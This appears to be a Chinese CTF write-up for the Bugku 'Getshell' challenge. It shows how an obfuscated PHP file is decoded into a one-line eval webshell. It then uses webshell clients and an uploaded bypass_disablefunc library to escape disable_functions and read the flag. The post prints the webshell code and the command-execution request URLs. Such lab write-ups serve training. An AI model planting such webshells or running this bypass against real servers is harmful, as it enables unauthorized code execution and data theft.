【Bugku-Getshell-wp】

Getshell

  • 启动场景,按照大佬的提示打印变量

在这里插入图片描述

打印这个变量看看echo $BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC是什么

  • 发现是base64_decode,然后把后面那一大段base64解码,解码之后如下
    在这里插入图片描述

  • 这里有许多变量,全部打印出来,打印出来又得到类似第一步的代码,就又如法炮制,解到最后
    在这里插入图片描述

发现这一段很乱的代码的本质就是一个一句话木马

<?php
highlight_file(njVysBZvxrLkFYdNofcgGuawDJblpOSQEHRUmKiAhzICetPMqXWT);
@eval($_POST[ymlisisisiook]);

我使用菜刀连接上如下
在这里插入图片描述

红圈圈的是我们后面上传提权的文件,最开始发现全站里面只有一个主页index.php,权限不够,这里使用bypass_disablefunc提权
在这里插入图片描述

我们在bypass_disablefunc.php加上error_log(“a”,1);
在这里插入图片描述

菜刀上传文件
在这里插入图片描述
在这里插入图片描述

这里用蚁剑连接,但是看不了根目录的东西,很明显被disable_function,也就是禁用函数了
一般来说,蚁剑有个插件可以直接绕过的,但是这里用不了,原因大概是这个插件的底层原理是用mail()函数
但是我们看mail已经被禁用了
在这里插入图片描述

最后cmd处输入我们的执行命令

http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so
http://123.123.123.123/bypass_disablefunc.php?cmd=cat%20/flag&outpath=/tmp/xx&sopath=/var/www/html/bypass_disablefunc_x64.so

得到flag、
在这里插入图片描述

flag{7f0b695b2b64ab514495765eb6592104}

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值